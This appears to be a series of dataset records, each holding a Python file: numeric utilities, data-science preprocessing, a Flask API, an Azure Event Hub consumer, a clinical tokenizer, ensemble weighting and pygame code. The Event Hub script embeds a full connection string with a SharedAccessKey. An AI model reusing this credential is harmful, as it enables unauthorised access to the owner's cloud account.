range(len(matrix[0])):\n temp_list = []\n for row_index in range(len(matrix)):\n temp_list.append(matrix[row_index][column_index])\n transposed_matrix[column_index] = temp_list\n return transposed_matrix\n\n\ndef equal_matrices(matrix1, matrix2):\n for i in range(len(matrix1)):\n for j in range(len(matrix1)):\n if matrix1[i][j] != matrix2[i][j]:\n return False\n\n return True\n\n\ndef vector_magnitude(vector):\n magnitude = 0\n for i in range(len(vector)):\n magnitude += vector[i]*vector[i]\n\n return sqrt(magnitude)","sub_path":"Second Project/Exercise5/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644075855","text":"import pandas as pd\n\ndef drop_null_features(df):\n for feature in df:\n if df[feature].isnull().sum() > (len(df) / 2):\n df = df.drop(feature, axis=1)\n return df\n\ndef drop_missing_data(df, list_cols):\n for col in list_cols:\n df = df.drop(df[df[col].isnull() == True].index)\n return df\n\ndef drop_features(df, list_cols):\n for col in list_cols:\n df = df.drop(col, axis=1)\n return df\n\ndef drop_aggregate_features(df, num_features):\n return df[df.columns[:-(num_features)]]\n\ndef create_state_dict(df, col1, col2):\n states1 = df[col1].unique()\n states2 = df[col2].unique()\n states = set(states1).union(states2)\n state_dict = {}\n for idx, state in enumerate(states):\n state_dict[state] = idx\n return state_dict\n\ndef replace_states(df, col1, col2):\n state_dict = create_state_dict(df, col1, col2)\n return df.replace({col1: state_dict}).replace({col2: state_dict})\n\n\nif __name__ == '__main__':\n full_df = pd.read_csv('../data/data_full.csv', index_col=0)\n mal_df = full_df[full_df['rectype'] == 'M']\n\n mal_df = drop_null_features(mal_df)\n\n # 'seqno' unique for each row, not useful\n # All 'rectype' are 'M', not useful\n useless_features = ['seqno', 'rectype']\n mal_df = drop_features(mal_df, useless_features)\n\n # Drop features with all 0 values\n zero_features = ['totalpmt', 'accrrpts']\n mal_df = drop_features(mal_df, zero_features)\n\n # Drop rows with missing data\n missing_features = ['practage', 'grad', 'workstat', 'licnstat', 'paynumbr']\n mal_df = drop_missing_data(mal_df, missing_features)\n\n # Drop features that were aggregated after malpractice settlement\n mal_df = drop_aggregate_features(mal_df, 10)\n\n # 
Convert 'workstat' and 'licnstat' states to integers\n mal_df = replace_states(mal_df, 'workstat', 'licnstat')\n\n mal_df.to_csv('../data/data_malpractice.csv')\n","sub_path":"code/feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574206337","text":"import threadpool\nimport multiprocessing\nimport time\nimport os,sys\nimport traceback\n\nthreadsNum = 5\n\n\ndef fun1(num):\n\tsum_num = 0\n\tfor i in range(num):\n\t\tsum_num += i\n\tprint(sum_num)\n\n\nparaList = [[10000000],[10000000],[10000000]]\nprint('start multiprocessing')\ntime1 = time.time()\npool = multiprocessing.Pool(threadsNum)\npool.starmap(fun1, paraList)\npool.close()\npool.join()\ntime2 = time.time()\nprint(time2-time1)\nprint('end')\n\n\nparaList = []\nparaList.append(([10000000], None))\nparaList.append(([10000000], None))\nparaList.append(([10000000], None))\nprint('start threadpool')\ntime3=time.time()\npool = threadpool.ThreadPool(threadsNum)\nrequests = threadpool.makeRequests(fun1, paraList)\n[pool.putRequest(req) for req in requests]\npool.wait()\ntime4=time.time()\nprint(time4-time3)\nprint('end')\n\n\t\n\n\n","sub_path":"threadpool_vs_multiprocess_ForTime.py","file_name":"threadpool_vs_multiprocess_ForTime.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"125304454","text":"# Load Packages.\nimport logging\nfrom azure.eventhub import EventHubConsumerClient\n\n# Declare the Connection string of event hub namespace, Event hub 2 name, consumer_group ($Default is the default consumer group).\nconnection_str = 'Endpoint=sb://eventhub1creditfraud.servicebus.windows.net/;SharedAccessKeyName=RootManageSharedAccessKey;SharedAccessKey=pm/II1egBW5aMxh7y0s5sI/b7F40njRJTZkyN7fQTfo='\nconsumer_group = '$Default'\neventhub_name = 'creditfraudhub2'\n# Create a consumer client to consume events from the event hub.\nclient = EventHubConsumerClient.from_connection_string(connection_str, consumer_group, eventhub_name=eventhub_name)\nlogger = logging.getLogger(\"azure.eventhub\")\nlogging.basicConfig(level=logging.INFO)\n\n# Whenever a event is received by event hub 2 the on_event function will be run.\ndef on_event(partition_context, event):\n #logger.info(\"Received event from partition {}\".format(partition_context.partition_id))\n print(\"Received the event: \\\"{}\\\" from the partition with ID: \\\"{}\\\"\".format(event.body_as_str(encoding='UTF-8'), partition_context.partition_id))\n print(event.body_as_str(encoding='UTF-8'))\n #res_dict = json.loads(result.decode('utf-8')) \n partition_context.update_checkpoint(event)\n #print(res_dict)\n print('-' * 20)\n\nwith client:\n client.receive(\n on_event=on_event, \n starting_position=\"-1\", # \"-1\" is from the beginning of the partition.\n )\n # receive events from specified partition:\n # client.receive(on_event=on_event, partition_id='0')\n","sub_path":"PythonScripts/Receive2.py","file_name":"Receive2.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"10557356","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport pickle\nimport os\nfrom keras.utils import np_utils\n\n\nclass Data:\n def __init__(self,\n mnist_data,\n train_x,\n train_y,\n test_x,\n test_y):\n self.mnist_data = mnist_data\n self.train_x = 
train_x\n self.train_y = train_y\n self.test_x = test_x\n self.test_y = test_y\n\n\nclass PretreatMgr:\n def extract(self):\n mnist_data = input_data.read_data_sets('data', one_hot=True)\n train_x, train_y = mnist_data.train.images, mnist_data.train.labels\n test_x, test_y = mnist_data.test.images, mnist_data.test.labels\n train_x = train_x.reshape(-1, 28, 28, 1) / 255\n test_x = test_x.reshape(-1, 28, 28, 1) / 255\n return Data(mnist_data, train_x, train_y, test_x, test_y)\n\n def save(self):\n if os.path.exists(\"data/data.pkl\"):\n os.remove(\"data/data.pkl\")\n file = open('data/data.pkl', 'wb')\n pickle.dump(self.extract(), file)\n\n def restore(self):\n file = open('data/data.pkl', 'rb')\n return pickle.load(file)\n\n\nif __name__ == '__main__':\n mgr = PretreatMgr()\n mgr.save()\n","sub_path":"deep_learning/digital_classify/pretreat.py","file_name":"pretreat.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"144415952","text":"import os\nfrom pathlib import Path\nimport sys\nimport supervisely_lib as sly\nfrom supervisely_lib.io.fs import mkdir\n\nmy_app = sly.AppService()\napi = my_app.public_api\ntask_id = my_app.task_id\n\nlogger = sly.logger\n\nmodel = None\ndevice = 'cuda'\n\nteam_id = int(os.environ['context.teamId'])\nworkspace_id = int(os.environ['context.workspaceId'])\nproject_id = int(os.environ['modal.state.slyProjectId'])\n\ndownload_batch_size = 10\ncalc_batch_size = 10\ngallery_data = None\n\nproject_info = api.project.get_info_by_id(project_id)\nif project_info is None: # for debug\n raise ValueError(f\"Project with id={project_id} not found\")\n\nproject_dir = os.path.join(my_app.data_dir, \"visualize_MLTask\")\ntemp_files = os.path.join(project_dir, \"temp_files\")\n\nif os.path.exists(temp_files): # clean temp\n sly.fs.clean_dir(temp_files)\n\nconverted_dir = os.path.join(temp_files, \"converted_input\")\nsly.fs.mkdir(converted_dir)\n\nprojects_dir = os.path.join(temp_files, \"projects\")\nsly.fs.mkdir(projects_dir)\ncheckpoints_dir = os.path.join(temp_files, \"checkpoints\")\nsly.fs.mkdir(checkpoints_dir)\nlocal_info_dir = os.path.join(temp_files, \"info\")\nsly.fs.mkdir(local_info_dir)\n\nproject_dir = os.path.join(my_app.data_dir, \"sly_project\")\nproject_meta = sly.ProjectMeta.from_json(api.project.get_meta(project_id))\n\nartifacts_dir = os.path.join(my_app.data_dir, \"artifacts\")\nsly.fs.mkdir(artifacts_dir)\ninfo_dir = os.path.join(artifacts_dir, \"info\")\nsly.fs.mkdir(info_dir)\ncheckpoints_dir = os.path.join(artifacts_dir, \"checkpoints\")\nsly.fs.mkdir(checkpoints_dir)\n\n\nembeddings_dir = os.path.join(artifacts_dir, \"embeddings\")\nsly.fs.mkdir(embeddings_dir)\nsly.fs.clean_dir(embeddings_dir)\n\nroot_source_dir = str(Path(sys.argv[0]).parents[1])\nsly.logger.info(f\"Root source directory: {root_source_dir}\")\nsys.path.append(root_source_dir)\n\n\nsys.path.append(os.path.join(root_source_dir, 'src'))\nsys.path.append(os.path.join(str(Path(sys.argv[0]).parents[2]), 'calculator'))\nsys.path.append(os.path.join(str(Path(sys.argv[0]).parents[3]), 'src'))\n\nsource_path = str(Path(sys.argv[0]).parents[0])\nsly.logger.info(f\"App source directory: {source_path}\")\nsys.path.append(source_path)\n\nui_sources_dir = os.path.join(source_path, \"ui\")\nsly.logger.info(f\"UI source directory: {ui_sources_dir}\")\nsys.path.append(ui_sources_dir)\nsly.logger.info(f\"Added to sys.path: {ui_sources_dir}\")\n\npascal_contour_color = [224, 224, 192]\nselected_classes 
= []\nclass_color_dict = {}\n\n# code for export-to-coco\n# user = api.user.get_info_by_id(user_id)\nuser_name = \"Supervisely\"\nproject = api.project.get_info_by_id(project_id)\nmeta_json = api.project.get_meta(project_id)\nmeta = sly.ProjectMeta.from_json(meta_json)\n\n# # embedding calculator\n# local_dataset_path = os.path.join(my_app.data_dir, 'sly_dataset')\n# remote_weights_path = os.environ['modal.state.slyFile']\n# remote_embeddings_dir = os.environ['modal.state.slyEmbeddingsDir']\n","sub_path":"supervisely/visualization/src/sly_globals.py","file_name":"sly_globals.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253198079","text":"import numpy as np\nimport random\nimport itertools\nimport os\n\nfrom objects import GameObj, Car, Obstacle, Bunker, Target\n\nclass Game:\n def __init__(self, width, height, obs, bun, show_game=True):\n self.width = width\n self.height = height\n self.show_game = show_game\n self.num_of_obstacles = obs\n self.num_of_bunkers = bun\n\n self.car = None\n self.target = Target(width, height)\n self.obstacles = None\n self.bunkers = None\n\n self.total_reward = 0.\n self.current_reward = 0.\n self.total_game = 0\n self.total_success = 0\n\n def _get_state(self):\n cstate = np.zeros((self.width, self.height))\n vstate = np.zeros((self.width, self.height))\n hstate = np.zeros((self.width, self.height))\n bstate = np.zeros((self.width, self.height))\n# mstate = np.zeros((self.width, self.height))\n\n cstate[self.car.row, self.car.col] = 1\n for o in self.obstacles:\n if o.dr != 0:\n vstate[o.row, o.col] = 1\n else:\n hstate[o.row, o.col] = 1\n for b in self.bunkers:\n bstate[b.row, b.col] = 1\n# for r in range(self.height):\n# for c in range(self.width):\n# if r + c <= self.car.max:\n# mstate[r, c] = 1\n# else:\n# break\n\n r = np.append(cstate, vstate, axis=0)\n r = np.append(r, hstate, axis=0)\n r = np.append(r, bstate, axis=0)\n# r = np.append(r, mstate, axis=0)\n return r\n\n def _draw_screen(self):\n os.system(\"clear\")\n\n title = str(self.total_success) + \" SUCCESSES / \" + str(self.total_game) + \" GAMES\"\n print(title)\n\n for r in range(self.height):\n for c in range(self.width):\n pos = GameObj(r, c)\n\n if self.car.row == r and self.car.col == c:\n print(\"o\", end=\"\")\n elif self.target.row == r and self.target.col == c:\n print(\"O\", end=\"\")\n elif list(filter(lambda o: o.same_pos(pos), self.obstacles)):\n print(\"X\", end=\"\")\n elif list(filter(lambda b: b.same_pos(pos), self.bunkers)):\n print(\"B\", end=\"\")\n else:\n print(\"_\", end=\"\")\n print()\n\n if self._is_gameover():\n print(\"GAME OVER!!\")\n elif self._is_success():\n print(\"SUCCESS!!\")\n\n def reset(self):\n self.steps = 0\n self.current_reward = 0\n self.total_game += 1\n\n self.car = Car()\n self.obstacles = []\n self.bunkers = []\n \n l = list(itertools.product(range(self.height), range(self.width)))\n random.shuffle(l)\n i = 0\n n = 0\n while n < self.num_of_obstacles + self.num_of_bunkers:\n r, c = l[i]\n if (r == 0 and c == 0) or (r == self.height - 1 and c == self.width - 1):\n pass\n else:\n if n < self.num_of_obstacles:\n self.obstacles.append(Obstacle(r, c))\n else:\n self.bunkers.append(Bunker(r, c))\n n += 1\n i += 1\n\n return self._get_state()\n\n def _update_car(self, action):\n return self.car.move(action, self.width, self.height)\n\n def _update_obstacles(self):\n objs = self.bunkers + [self.target]\n for o in self.obstacles:\n o.move(self.width, 
self.height, objs)\n\n def _is_gameover(self):\n return list(filter(lambda o: o.same_pos(self.car), self.obstacles))\n\n def _is_success(self):\n return self.car.same_pos(self.target)\n\n def step(self, action):\n move_reward = self._update_car(action)\n gameover = self._is_gameover()\n success = self._is_success()\n\n if (not gameover) and (not success):\n self._update_obstacles()\n gameover = self._is_gameover()\n\n if gameover:\n reward = -(self.height + self.width)\n elif success:\n self.total_success += 1\n reward = (self.height + self.width)\n else:\n reward = move_reward\n self.current_reward += reward\n\n end = gameover or success\n if end:\n self.total_reward += self.current_reward\n\n if self.show_game:\n self._draw_screen()\n\n return self._get_state(), reward, end, success\n","sub_path":"traffic/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"476749085","text":"import nltk\n\nfrom nltk.tokenize.punkt import PunktSentenceTokenizer, PunktParameters, PunktLanguageVars\nfrom nltk.tokenize.treebank import TreebankWordTokenizer\n\nfrom clinical_tokenizers import ClinicalSentenceTokenizer, IndexTokenizer\n\nfrom PyRuSH.RuSH import RuSH\n\nclass CustomSentenceBreakingLangVars(PunktLanguageVars):\n mything = 'something'\n # this does nothing -- these must be changed after construction\n #send_end_chars = ('.', '!')\n\ndef build_n2c2_tokenizer(keep_token_strings = False, enable_pyrush_sentence_tokenizer = False, disable_custom_preprocessing = True):\n print('Building n2c2 tokenizer...')\n cs_preprocess_split_re_strings = []\n # double newlines\n cs_preprocess_split_re_strings.append(r'[\\r\\n]{2,}')\n # newlines with only spaces\n cs_preprocess_split_re_strings.append(r'[\\r\\n]+\\s+[\\r\\n]+')\n # numbered lists (e.g. \"1.\", \"2)\")\n cs_preprocess_split_re_strings.append(r'(^|\\r|\\n)+\\s*\\d+[.)-]')\n # bulleted lists (e.g.\"*\", \"-\")\n cs_preprocess_split_re_strings.append(r'(^|\\r|\\n)+\\s*[*-]')\n # starting labels (e.g. 
\"WEIGHT:\")\n cs_preprocess_split_re_strings.append(r'(^|\\r|\\n)+\\s*\\w+[:]')\n # break up other lines separated by dates\n cs_preprocess_split_re_strings.append(r'(^|\\r|\\n)+\\s*\\d{1,2}[/-]\\d{1,2}[/-]\\d{2,4}')\n # MIMIC has many lines that start with this [**YYYY-M-DD**]\n cs_preprocess_split_re_strings.append(r'^\\[\\*+\\d{4}-\\d{1,2}-\\d{1,2}\\*+\\]')\n # TIU notes have long bars like this : '***********' or '===========' or '------'\n cs_preprocess_split_re_strings.append(r'[*=-]{3,}')\n \n # NOTE : This breaking rule was disabled 2-13-18 since the UMass MADE challenge data often ended each line with 2 spaces and a \n # newline which caused this aggressive rule to fire over and over again.\n # aggressively break anything with lots of spaces (tabular data)\n #cs_preprocess_split_re_strings.append(r'\\s{3,}')\n \n \n custom_lang_vars = CustomSentenceBreakingLangVars()\n custom_lang_vars.sent_end_chars = ('.', '!')\n print(custom_lang_vars.sent_end_chars)\n\n punkt_tokenizer2 = PunktSentenceTokenizer(lang_vars = custom_lang_vars)\n treebank_tokenizer = TreebankWordTokenizer()\n\n # looks like \"pt.\" and \"D.R.\" and \"P.R.\" are already being handled\n #punkt_tokenizer2._params.abbrev_types.update(extra_abbrev) \n \n sentence_tokenizer = None\n if enable_pyrush_sentence_tokenizer:\n print('Enabling PyRuSH for sentence tokenization...')\n pyrush_sentence_tokenizer = RuSH('resources/PyRuSH/conf/rush_rules.tsv')\n sentence_tokenizer = pyrush_sentence_tokenizer\n else:\n print('Enabling NLTK Punkt for sentence tokenization...')\n sentence_tokenizer = punkt_tokenizer2\n \n print('Type of sentence tokenizer : {}'.format(type(sentence_tokenizer)))\n \n enabled_preprocessing_expressions = []\n if not disable_custom_preprocessing:\n print('Enabling custom preprocessing expressions. Total : {}'.format(len(cs_preprocess_split_re_strings)))\n enabled_preprocessing_expressions = cs_preprocess_split_re_strings\n else:\n print('Not allowing custom preprocessing expressions...')\n \n cs_tokenizer = ClinicalSentenceTokenizer(default_sentence_tokenizer = sentence_tokenizer, preprocess_split_re_strs = enabled_preprocessing_expressions)\n\n index_tokenizer = IndexTokenizer(cs_tokenizer, treebank_tokenizer, keep_token_strings = keep_token_strings)\n \n return index_tokenizer\n","sub_path":"n2c2_tokenizer.py","file_name":"n2c2_tokenizer.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"497088612","text":"import logging\nimport multiprocessing as mp\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom codem.ensemble.PV import rmse_out_map, trend_out_map\n\nlogger = logging.getLogger(__name__)\n\n\ndef rank_array(array):\n \"\"\"\n (array) -> array\n Rank each value in an array from 1 to N where N is the number of elements in\n the array with the lowest value is one and the highest value is N.\n \"\"\"\n temp = array.argsort()\n ranks = np.empty(len(array), int)\n ranks[temp] = np.arange(len(array))\n return ranks\n\n\ndef gangnam_weight(ranked_array, psi, cutoff):\n \"\"\"\n (array of integers, float, int) -> array\n\n Given an array of ranks assigns a psi value to each element in the array\n corresponding to the rank of the element. The higher the rank (the closer to\n one the rank is) the higher the psi weight it will receive. Any value above\n teh cutoff value will receive a value of zero. 
The returned array should sum\n to one.\n \"\"\"\n N = min([len(ranked_array), 100])\n denominator = float(sum(psi**(N - ranked_array)))\n psi_weighted = psi**(N-ranked_array) / denominator\n psi_weighted *= (ranked_array <= cutoff)\n return psi_weighted\n\n\ndef psi_weights(space_err, lin_err, psi, cutoff):\n \"\"\"\n (array, array, float, int) -> tuple of 2 arrays\n\n Given two equal length arrays of values corresponding to the error of space\n time models and error of linear models alongside a psi value by which to\n weight the models returns two arrays with the corresponding psi weight for\n each model such that the sum of the two arrays should add to one. The first\n array should be applied to the space time models while the second should be\n applied to the linear models.\n \"\"\"\n array = np.append(space_err, lin_err)\n ranks = rank_array(array)\n psi_values = gangnam_weight(ranks, psi, cutoff)\n M = int(len(psi_values) / 2)\n return psi_values[:M], psi_values[M:]\n\n\ndef psi_draws(space_err, lin_err, psi, cutoff):\n \"\"\"\n (array, array, float, int) -> tuple of 2 arrays\n\n Given two equal length arrays of values corresponding to the error of space\n time models and error of linear models alongside a psi value by which to\n weight the models returns two arrays with the corresponding number of draws\n for each model such that the sum of the two arrays should add to one. The\n first array should be applied to the space time models while the second\n should be applied to the linear models.\n \"\"\"\n array = np.append(space_err, lin_err)\n ranks = rank_array(array)\n psi_values = gangnam_weight(ranks, psi, cutoff)\n draws = (psi_values * 1000).astype(int)\n leftover = 1000 - sum(draws)\n draws[np.argmax(draws)] += leftover\n M = int(len(psi_values) / 2)\n ranks = 1 + np.array(ranks)\n return draws[:M], draws[M:], ranks[:M], ranks[M:]\n\n\ndef psi_predict(space_pred, lin_pred, space_err, lin_err, psi, cutoff):\n \"\"\"\n (array, array, array, array, float, int) -> array\n\n Given the prediction estimations for models with the same knockout pattern\n apply weights to each model and use the ensemble of the models to make\n predictions. Just like Netflix.\n \"\"\"\n logger.info(f\"Make psi-predictions using means for psi value {psi}\")\n space_weights, lin_weights = psi_weights(space_err, lin_err, psi, cutoff)\n space_weights = space_weights\n lin_weights = lin_weights\n new_pred = (space_pred * space_weights) + (lin_pred * lin_weights)\n return new_pred.sum(axis=1)\n\n\ndef psi_range(space_pred, lin_pred, space_err, lin_err, psi_values, cutoff):\n \"\"\"\n (array, array, array, array, array, int) -> array\n\n Make ensemble predictions using a range of psi values. 
Returns an array of\n values with a number of rows equal to the number of observations in\n space_pred and lin_pred and a number of columns equal to the number of\n values in psi range.\n \"\"\"\n psi_pred = np.array(\n [psi_predict(\n space_pred, lin_pred, space_err, lin_err, x, cutoff\n ) for x in psi_values]\n )\n return psi_pred.T\n\n\ndef psi_map(inputs):\n \"\"\"\n (list) -> array\n\n Helper function that allows for a parallelized version of psi ensemble\n prediction across all knockout patterns.\n \"\"\"\n space_pred, lin_pred, space_err, lin_err, psi_values, cutoff = inputs\n p = psi_range(space_pred, lin_pred, space_err, lin_err, psi_values, cutoff)\n return p\n\n\ndef ensemble_all(space_models, linear_models, psi_values, cutoff):\n \"\"\"\n (all_model, all_model, array, int) -> list of arrays\n\n Generate the ensemble predictions across al knockouts for various values of\n psi.\n \"\"\"\n logger.info(\"Generating ensemble predictions across all knockouts for various \"\n \"values of psi using just means * weights.\")\n inputs = [(space_models.all_models[i].pred_mat,\n linear_models.all_models[i].pred_mat, space_models.RMSE +\n space_models.trend, linear_models.RMSE + linear_models.trend,\n psi_values, cutoff)\n for i in range(len(space_models.all_models) - 1)]\n p = mp.Pool(20)\n ensemble_predictions = np.array(list(p.map(psi_map, tqdm(inputs))))\n p.close()\n p.join()\n return ensemble_predictions\n\n\ndef rmse_ensemble_out(list_of_preds, data_frame, knockouts):\n \"\"\"\n (list of model_lists, data frame, list of data frames) ->\n array\n\n Calculate the RMSE of all ensembles across all knockout patterns and\n average the results to be used for ranking at a later time. An array of\n length equal to the number of psi_values is is returned with the median\n RMSE.\n \"\"\"\n logger.info(\"Calculating OOS RMSE for ensembles with different psi values.\")\n inputs = [(data_frame, knockouts[i], list_of_preds[i])\n for i in range(len(list_of_preds))]\n p = mp.Pool(20)\n rmse_all = np.array(list(p.map(rmse_out_map, tqdm(inputs))))\n p.close()\n p.join()\n return np.median(rmse_all, axis=0)\n\n\ndef trend_ensemble_out(list_of_preds, data_frame, knockouts, window):\n \"\"\"\n (list of model_lists, data frame, list of data frames, list of str) ->\n array\n\n Calculate the trend of all ensembles across all knockout patterns and\n average the results to be used for ranking at a later time. 
An array of\n length equal to the number of psi_values is is returned with the median\n trend.\n \"\"\"\n logger.info(\"Calculating OOS trend for ensembles with different psi values.\")\n inputs = [(data_frame, knockouts[i], list_of_preds[i], window)\n for i in range(len(list_of_preds))]\n p = mp.Pool(20)\n trend_all = np.array(list(p.map(trend_out_map, tqdm(inputs))))\n p.close()\n p.join()\n return np.median(trend_all, axis=0)\n\n\ndef best_psi(data_frame, knockouts, window, space_models, linear_models, psi_values, cutoff):\n \"\"\"\n (data frame, list of dfs, int, all_model, all_model, array, int) -> float\n\n Get the best value of psi using the median value across all knockouts.\n \"\"\"\n logger.info(\"Getting the best psi value using median rmse and trend error across all knockouts.\")\n ens_preds = ensemble_all(space_models, linear_models, psi_values, cutoff)\n rmse = rmse_ensemble_out(ens_preds, data_frame, knockouts)\n trend = trend_ensemble_out(ens_preds, data_frame, knockouts, window)\n best_rmse = rmse[np.argmin(rmse + trend)]\n best_trend = trend[np.argmin(rmse + trend)]\n psi = psi_values[np.argmin(rmse + trend)]\n d1, d2, r1, r2 = psi_draws(space_models.RMSE + space_models.trend,\n linear_models.RMSE + linear_models.trend, psi, cutoff)\n return psi, d1, d2, best_rmse, best_trend, r1, r2\n","sub_path":"gbd_2019/shared_code/central_comp/cod/codem/codem/ensemble/gangnam_style.py","file_name":"gangnam_style.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"291080072","text":"#!/usr/bin/python3\n\"\"\"\nThis file contains the City module\n\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, request, make_response\nfrom models import storage\nfrom models.state import State\nfrom models.city import City\nfrom flasgger.utils import swag_from\n\n\n@app_views.route('/states//cities',\n methods=['GET'], strict_slashes=False)\n@swag_from('documentation/city/get.yml', methods=['GET'])\ndef get_cities(state_id):\n \"\"\" Gets cities for state_id \"\"\"\n state = storage.get(State, state_id)\n if state is None:\n abort(404)\n list_cities = [obj.to_dict() for obj in state.cities]\n return jsonify(list_cities)\n\n\n@app_views.route('/cities/', methods=['GET'],\n strict_slashes=False)\n@swag_from('documentation/city/get_id.yml', methods=['GET'])\ndef get_city(city_id):\n \"\"\" get city by id\"\"\"\n city = storage.get(City, city_id)\n if city is None:\n abort(404)\n return jsonify(city.to_dict())\n\n\n@app_views.route('/cities/', methods=['DELETE'],\n strict_slashes=False)\n@swag_from('documentation/city/delete.yml', methods=['DELETE'])\ndef del_city(city_id):\n \"\"\" delete city by id\"\"\"\n city = storage.get(City, city_id)\n if city is None:\n abort(404)\n city.delete()\n storage.save()\n return jsonify({})\n\n\n@app_views.route('/states//cities', methods=['POST'],\n strict_slashes=False)\n@swag_from('documentation/city/post.yml', methods=['POST'])\ndef create_obj_city(state_id):\n \"\"\" create new instance \"\"\"\n state = storage.get(State, state_id)\n if state is None:\n abort(404)\n if not request.get_json():\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n if 'name' not in request.get_json():\n return make_response(jsonify({\"error\": \"Missing name\"}), 400)\n\n js = request.get_json()\n obj = City(**js)\n obj.state_id = state.id\n obj.save()\n return jsonify(obj.to_dict()), 201\n\n\n@app_views.route('/cities/', methods=['PUT'],\n 
strict_slashes=False)\n@swag_from('documentation/city/put.yml', methods=['PUT'])\ndef post_city(city_id):\n \"\"\" \"\"\"\n if not request.get_json():\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n obj = storage.get(City, city_id)\n if obj is None:\n abort(404)\n for key, value in request.get_json().items():\n if key not in ['id', 'state_id', 'created_at', 'updated_at']:\n setattr(obj, key, value)\n storage.save()\n return jsonify(obj.to_dict())\n","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"509871412","text":"\"\"\"\nPyXLL Examples: Pandas\n\nThis module contains example functions that show how pandas DataFrames and Series\ncan be passed to and from Excel to Python functions using PyXLL.\n\nPandas needs to be installed for this example to work correctly.\n\nSee also the included examples.xlsx file.\n\"\"\"\nfrom pyxll import xl_func\n\n@xl_func(volatile=True)\ndef pandas_is_installed():\n \"\"\"returns True if pandas is installed\"\"\"\n try:\n import pandas\n return True\n except ImportError:\n return False\n\n@xl_func(\"int, int: dataframe\", auto_resize=True)\ndef random_dataframe(rows, columns):\n \"\"\"\n Creates a DataFrame of random numbers.\n\n :param rows: Number of rows to create the DataFrame with.\n :param columns: Number of columns to create the DataFrame with.\n \"\"\"\n import pandas as pa\n import numpy as np\n\n data = np.random.rand(rows, columns)\n column_names = [chr(ord('A') + x) for x in range(columns)]\n df = pa.DataFrame(data, columns=column_names)\n\n return df\n\n@xl_func(\"dataframe, float[], str[], str[]: dataframe\", auto_resize=True)\ndef describe_dataframe(df, percentiles=[], include=[], exclude=[]):\n \"\"\"\n Generates descriptive statistics that summarize the central tendency, dispersion and shape of a dataset's\n distribution, excluding NaN values.\n\n :param df: DataFrame to describe.\n :param percentiles: The percentiles to include in the output. 
All should fall between 0 and 1.\n :param include: dtypes to include.\n :param exclude: dtypes to exclude.\n :return:\n \"\"\"\n # filter out any blanks\n percentiles = list([_f for _f in percentiles if _f])\n include = list([_f for _f in include if _f])\n exclude = list([_f for _f in exclude if _f])\n\n return df.describe(percentiles=percentiles or None,\n include=include or None,\n exclude=exclude or None)\n","sub_path":"examples/pandas_example.py","file_name":"pandas_example.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243622990","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Importacion de los módulos\nimport pygame\nfrom pygame.locals import *\nimport os\nimport sys\n\n# ----------------------------------------------\n# Constantes, como anchos y largo de pantalla, etc.\n# ----------------------------------------------\n\nSCREEN_WIDTH = 626\nSCREEN_HEIGHT = 470\nFULLSCREEN_WIDTH = 626\nFULLSCREEN_HEIGHT = 470\nLINE_HEIGHT = 50\nSCORE_LIMIT = 2\nCUP_WIDTH = 182\nCUP_HEIGHT = 193\nIMG_DIR = \"img\"\nSND_DIR = \"snd\"\n\n# ----------------------------------------------\n# Clases y Funciones utilizadas\n# ----------------------------------------------\n\ndef load_image(nombre, dir_imagen, alpha=False):\n # Encontramos la ruta completa de la imagen\n ruta = os.path.join(dir_imagen, nombre)\n try:\n image = pygame.image.load(ruta)\n except:\n print(\"Error, no se puede cargar la imagen: \" + ruta)\n sys.exit(1)\n # Comprobar si la imagen tiene \"canal alpha\" (ej: png)\n if alpha is True:\n image = image.convert_alpha()\n else:\n image = image.convert()\n return image\n\ndef load_sound(nombre, dir_sonido):\n ruta = os.path.join(dir_sonido, nombre)\n # Intentar cargar el sonido\n try:\n\t sonido = pygame.mixer.Sound(ruta)\n except (pygame.error) as message:\n\t print (\"No se pudo cargar el sonido:\", ruta)\n\t sonido = None\n return sonido\n\n# ----------------------------------------------\n# Sprites (clases) de los objetos del juego\n# ----------------------------------------------\n\nclass Pelota(pygame.sprite.Sprite):\n \"La bola y su comportamiento en la pantalla\"\n \n def __init__(self):\n\t pygame.sprite.Sprite.__init__(self)\n\t self.image = load_image(\"bola.png\", IMG_DIR, True)\n\t self.rect = self.image.get_rect()\n\t #self.rect.centerx = SCREEN_WIDTH/2\n\t #self.rect.centery = SCREEN_HEIGHT/2\n\t self.rect.centerx = FULLSCREEN_WIDTH/2\n\t self.rect.centery = FULLSCREEN_HEIGHT/2\n\t self.speed = [4, 3]\n\n def update(self, marcador, sonido_punto=None):\n \"\"\"if self.rect.left < 0 or self.rect.right > SCREEN_WIDTH:\n\t self.speed[0] = 